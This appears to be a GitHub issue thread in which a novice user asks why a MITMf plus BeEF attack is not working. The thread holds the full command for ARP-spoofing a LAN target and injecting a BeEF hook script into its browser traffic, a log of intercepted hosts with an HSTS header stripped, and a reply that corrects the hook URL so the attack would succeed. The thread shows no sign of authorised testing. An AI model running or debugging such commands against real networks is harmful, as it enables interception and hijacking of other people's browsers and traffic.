### ISSUE TITLE
mitmf + Beef

### ISSUE THREAD

**Issue by m-imran79** [byt3bl33d3r/MITMf#446]
Hello All,

I am a non tech person, and learning from Youtube videos. I am facing an issue when I use mitmf with beef while using it with wlan0. Beef Terminal does not show any Online Hooked IP.  I am getting following error when I run the mitmf command.

mitmf --arp --spoof --gateway 192.168.1.254 --target 192.168.1.62 -i wlan0 --inject --js-url http://127.0.0.1:3000/hook.js

The error I get in terminal is :

Trace back (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'
2018-02-09 20:55:09 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'
2018-02-09 20:55:09 192.168.1.62 [type:Chrome-64 os:Windows 7] sync.company-target.com
2018-02-09 20:55:09 192.168.1.62 [type:Chrome-64 os:Windows 7] sync.sharethis.com
2018-02-09 20:55:09 192.168.1.62 [type:Chrome-64 os:Windows 7] green.erne.co
2018-02-09 20:55:09 192.168.1.62 [type:Chrome-64 os:Windows 7] Zapped a strict-trasport-security header
2018-02-09 20:55:09 [ProxyPlugins] Exception occurred in hooked function﻿

**Comment by n00py** [comment]
I can;t help with your issue but I can tell you the BeEF hook URL is incorrect.   You shouldn't be using 127.0.0.1 but rather a routable IP for the system that is running BeEF.  

Right now if a client hit that hook it would not work because they would try to load the hook from their own system and it would not work.
